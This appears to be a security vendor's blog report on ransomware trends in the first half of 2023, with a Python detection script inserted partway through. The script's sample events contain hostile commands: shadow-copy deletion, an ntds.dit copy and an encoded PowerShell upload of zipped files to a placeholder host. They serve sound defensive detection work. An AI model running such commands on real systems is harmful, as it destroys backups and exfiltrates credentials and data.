Power Rankings: Ransomware Malicious Quartile First-Half 2023
More than 2,300 organizations fell victim to ransomware attacks in the first half of 2023 alone, with a majority (61.4%) attributed to just three operators: LockBit (35.3%), BlackCat/ALPHV (14.2%), and Cl0p (11.9%).
Overall, ransomware attacks were up 74% in Q2-2023 over Q1. Ransomware attacks continue to be extremely lucrative, with ransom demands and recovery costs bleeding victim organizations for millions of dollars.
RaaS operators and other data extortion attackers are developing custom tooling and implementing novel evasion techniques into their payloads designed to evade or completely circumvent traditional endpoint protection solutions.
Ransomware operators are expanding their addressable target range with additional Linux variants emerging, as well as one of the first viable variants targeting macOS.
Furthermore, ransomware attacks are creating liability issues and intellectual property loss for organizations as attackers focus on the exfiltration of sensitive data prior to delivering the ransomware payload.
Key Highlights for First-Half 2023
The Halcyon team of ransomware experts publishes a quarterly RaaS and extortion group power ranking guide as a quick reference. The Q2-2023 report is available here: Power Rankings: Ransomware Malicious Quartile Q2 2023 (PDF).
General Trends
Some interesting trends emerged in the first half of 2023, evidence that ransomware operators are investing heavily in development and are improving operational efficiencies through automation:
- The precipitous decline in attacks observed in 2022 was short-lived, with attack volume records smashed in March 2023
- Attackers are expanding their addressable targets with more groups developing Linux variants
- Some ransomware groups are shifting tactics to straight data exfiltration extortion attacks with no encryption payload
- 8Base ransomware gang ramps up with a whopping 67 attacks as of May 2023
- Dish Network is just one of the victim organizations facing class action lawsuits stemming from ransomware attacks that exposed sensitive data
Tooling
Operators continue to invest in new tooling:
- Attackers introduced custom EDR-killer tooling such as AuKill and Backstab, which load a legitimately signed but vulnerable driver in order to terminate security software (bring-your-own-vulnerable-driver)
- Ransomware operators developed custom collection tools such as Grixba (an information stealer) and a VSS copying tool that reads files out of Volume Shadow Copies to reach data that is locked on the live filesystem
- Attackers observed using Living-off-the-Land (LotL) techniques by way of a custom PowerShell-based tool to automate data exfiltration on targeted networks
- What may be the first ransomware variant targeting macOS was detected in the wild
- Semi-autonomous ransomware strain dubbed Rorschach emerges with advanced automation, fast encryption speed and stealthy DLL side-loading for security evasion and persistence
- BlackCat/ALPHV released variant dubbed Sphynx that dramatically increases both encryption speed and stealth in bypassing security solutions
Tactics
Attackers continue to innovate their tactics:
- Attackers are increasingly automating exploitation of known vulnerabilities in products such as MOVEit Transfer, Palo Alto Networks Cortex XDR (in that case, abuse of a signed component for DLL side-loading rather than a software flaw), GoAnywhere MFT, IBM Aspera Faspex, VMware ESXi, PaperCut and Microsoft SQL Server
- Ransomware gangs are increasingly exposing stolen sensitive data, for example by leaking clinical photographs of breast cancer patients
- The Cl0p gang claimed more than 100 victims in a massive attack spree by exploiting a vulnerability in GoAnywhere MFT software, a precursor to an even bigger campaign that leveraged a vulnerability in MOVEit Transfer software to compromise hundreds more victims
- Ransomware operators are increasingly using advanced techniques like DLL Side-Loading which are more typical of APT-type operations
- A new extortion tactic was observed where attackers instruct victims to disclose the details of their cyber insurance coverage so that the ransom demand can be set to match it
- Nokoyawa operators exploited a Windows Common Log File System (CLFS) zero-day (CVE-2023-28252) for privilege escalation; zero-day use is highly unusual for ransomware operators and is a tactic more common to APT operations
- A ransomware attack abused Microsoft SharePoint through a compromised Global Admin account, encrypting data without first compromising an endpoint
- The novel Cactus ransomware exploits known vulnerabilities in VPN appliances to gain a foothold on the network
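Three of the patterns named in the Tooling and Tactics lists above (shadow copy abuse, DLL side-loading by a signed binary, and PowerShell-driven exfiltration staging) can be turned into simple detection logic. The following is an added example written for this page, not code from the report or from Halcyon: it models Sysmon ProcessCreate and ImageLoad fields, and the event class, the paths, file names and sample telemetry are all constructed for illustration.

```python
"""Heuristic detections for three tooling patterns the report lists:
shadow-copy abuse (VSS copying and pre-encryption deletion), DLL side-loading
by a signed binary dropped in a user-writable directory, and PowerShell-driven
exfiltration staging.  Fields are modelled on Sysmon ProcessCreate (EID 1) and
ImageLoad (EID 7); the Event class and all sample data are constructed for
this example and do not come from any real incident."""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str                     # "process" (EID 1) or "image_load" (EID 7)
    image: str                    # full path of the process
    cmdline: str = ""             # command line (process events only)
    loaded: str = ""              # DLL path (image_load events only)
    process_signed: bool = False  # assumed joined in from the EID 1 record
    loaded_signed: bool = False   # Sysmon EID 7 "Signed" field


USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")

# Creating a shadow copy and then reading through the GLOBALROOT device path is
# the "VSS copying" pattern (copy locked files such as ntds.dit); deleting
# shadows is the classic pre-encryption step.
SHADOW_RX = [
    re.compile(r"vssadmin(?:\.exe)?\s+(?:delete|create)\s+shadow", re.I),
    re.compile(r"wmic(?:\.exe)?\s+shadowcopy\s+(?:delete|call\s+create)", re.I),
    re.compile(r"\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\d+", re.I),
]
UPLOAD_RX = [
    re.compile(r"Invoke-(?:WebRequest|RestMethod)\b.*?-(?:InFile|Method\s+Put)", re.I | re.S),
    re.compile(r"Start-BitsTransfer\b.*?-Destination\s+https?://", re.I | re.S),
    re.compile(r"\.UploadFile\(", re.I),
]
STAGING_RX = re.compile(r"Compress-Archive\b", re.I)
ENC_RX = re.compile(r"(?:^|\s)-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def encode_for_powershell(script: str) -> str:
    """PowerShell -EncodedCommand takes base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload, or "" if absent/invalid."""
    m = ENC_RX.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def _dir(path: str) -> str:
    return path.lower().rsplit("\\", 1)[0] + "\\"


def _is_powershell(image: str) -> bool:
    return image.lower().rsplit("\\", 1)[-1] in ("powershell.exe", "pwsh.exe")


def check_process(ev: Event) -> list[tuple[str, str]]:
    hits: list[tuple[str, str]] = []
    if any(rx.search(ev.cmdline) for rx in SHADOW_RX):
        hits.append(("shadow_copy_abuse", ev.cmdline))
    if _is_powershell(ev.image):
        # Inspect the decoded payload, not just the wrapper command line.
        text = ev.cmdline + "\n" + decode_encoded_command(ev.cmdline)
        if any(rx.search(text) for rx in UPLOAD_RX):
            level = "high" if STAGING_RX.search(text) else "medium"
            hits.append(("powershell_exfil_staging", level))
    return hits


def check_image_load(ev: Event) -> list[tuple[str, str]]:
    """Signed EXE in a user-writable directory loading an unsigned DLL that
    sits next to it: the classic side-loading layout."""
    if (ev.process_signed and not ev.loaded_signed
            and _dir(ev.image) == _dir(ev.loaded)
            and _dir(ev.loaded).startswith(USER_WRITABLE)):
        return [("dll_side_loading", f"{ev.image} -> {ev.loaded}")]
    return []


def analyze(events: list[Event]) -> list[tuple[str, str]]:
    hits: list[tuple[str, str]] = []
    for ev in events:
        hits.extend(check_process(ev) if ev.kind == "process" else check_image_load(ev))
    return hits


# Constructed sample telemetry; every path, host and file name is hypothetical.
EXFIL_SCRIPT = ("Compress-Archive -Path C:\\Finance -DestinationPath C:\\Users\\Public\\f.zip; "
                "Invoke-RestMethod -Uri https://example.invalid/up -Method Put -InFile C:\\Users\\Public\\f.zip")
SAMPLE_EVENTS = [
    Event("process", "c:\\windows\\system32\\vssadmin.exe", "vssadmin.exe delete shadows /all /quiet"),
    Event("process", "c:\\windows\\system32\\cmd.exe",
          "cmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy3\\Windows\\NTDS\\ntds.dit C:\\Users\\Public\\n.dit"),
    Event("process", "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
          "powershell.exe -nop -w hidden -enc " + encode_for_powershell(EXFIL_SCRIPT)),
    Event("image_load", "c:\\users\\public\\tools\\updater.exe", loaded="c:\\users\\public\\tools\\version.dll",
          process_signed=True, loaded_signed=False),
    Event("process", "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "powershell.exe Get-Process"),
    Event("image_load", "c:\\windows\\system32\\svchost.exe", loaded="c:\\windows\\system32\\ntdll.dll",
          process_signed=True, loaded_signed=True),
]

if __name__ == "__main__":
    for rule, detail in analyze(SAMPLE_EVENTS):
        print(f"{rule:26} {detail}")
```

The encoded-command decoding is the part worth copying: a rule that only looks at the wrapper command line never sees the `Invoke-RestMethod ... -InFile` inside a `-EncodedCommand` payload. The side-loading heuristic needs the process signature joined from the process-creation record, since Sysmon's ImageLoad event only reports the signature of the loaded image.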
Enforcement Actions
The first half of 2023 brought some scattered enforcement actions, arrests and indictments of affiliates and other low-level threat actors in the ransomware arena, including:
- The takedown of the notorious Hive ransomware operation
- Indictment of Mikhail Pavlovich Matveev for participation in LockBit, Babuk, and Hive attacks
- Arrest of Ruslan Magomedovich Astamirov in Arizona for participating in LockBit attacks
- Arrest of two individuals in Germany and Ukraine believed to be core members of the DoppelPaymer ransomware group, with warrants issued for three more members
- Arrest of three Dutch nationals alleged to have extorted hundreds of thousands of euros from thousands of companies
The Takeaway
Law enforcement, meanwhile, has had very little impact in terms of disrupting ransomware operations.
The one thing the most notorious ransomware gangs have in common is their ties to Russia, with many of them closely aligned with, if not directly controlled by, the Russian government and its intelligence apparatus.
The increasing overlap of cybercriminal activity with nation-state-supported operations gives Russia plausible deniability: it can distance itself from the attacks while remaining instrumental in them.
Using ransomware gangs as a proxy to conduct attacks and thwart attribution is the strategy here. This is one of the key reasons cyber operations have become such an important aspect of larger geopolitical issues – because attribution is hard.
The US and allied governments are in a tough position regarding what actions to take to stem this wave of ransomware attacks, namely because there is so much ambiguity in determining root attribution for the attacks.
Even when ransomware operators are arrested, there is someone to take their place quickly. Ultimately, it is the Russian government that is providing safe harbor for most of the criminal elements conducting ransomware attacks.
Until the US government directly sanctions Russia for their direct and/or tacit support of ransomware and data extortion operations, we will not see attacks subside any time soon.
It's only a matter of time before we see another massively disruptive attack against a critical infrastructure target, and by then it will be too late to act.
Halcyon.ai is the industry’s first dedicated, adaptive security platform that combines multiple advanced proprietary prevention engines along with AI models focused specifically on stopping ransomware – talk to a Halcyon expert today to find out more. And check out the Recent Ransomware Attacks resource site to get near real-time tracking of ransomware attacks, threat actor groups and their victims.